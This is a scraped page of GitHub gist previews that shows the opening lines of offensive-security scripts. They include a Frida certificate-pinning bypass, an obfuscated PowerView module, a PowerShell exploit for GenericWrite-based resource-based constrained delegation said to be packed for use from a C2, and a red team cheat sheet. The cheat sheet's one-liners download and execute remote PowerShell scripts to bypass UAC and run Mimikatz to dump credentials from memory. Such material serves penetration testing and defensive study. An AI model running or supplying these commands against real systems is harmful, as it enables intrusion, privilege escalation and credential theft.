This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Java.perform(function() { | |
| console.log('\n[.] Cert Pinning Bypass'); | |
| // Create a TrustManager that trusts everything | |
| console.log('[+] Creating a TrustyTrustManager that trusts everything...'); | |
| var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); | |
| var TrustyTrustManager = Java.registerClass({ | |
| name: 'com.example.TrustyTrustManager', | |
| implements: [X509TrustManager], | |
| methods: { |
nullbind
/ Obfuscated-PowerView-Example.psm1
Last active
January 25, 2024 13:28
Obfuscated-PowerView-Example.psm1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function New-InMemoryModule | |
| { | |
| Param | |
| ( | |
| [Parameter(Position = 0)] | |
| [ValidateNotNullOrEmpty()] | |
| [String] | |
| $ModuleName = [Guid]::NewGuid().ToString() | |
| ) |
klezVirus
/ GenericWriteRBCD.ps1
Last active
March 5, 2025 09:19
Exploit the GenericWrite DACL on a computer object (from a user or computer account)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-GenericWriteRBCD | |
| { | |
| <# Based on Gist by dirkjan - Packed to be used from a C2 #> | |
| [CmdletBinding()] | |
| param | |
| ( | |
| [Parameter(Mandatory=$True, HelpMessage="The name for the newly created computer")] | |
| [string]$Computer, |
drwscefn
/ RedTeam_CheatSheet.ps1
Created
August 19, 2022 18:26
— forked from jivoi/RedTeam_CheatSheet.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |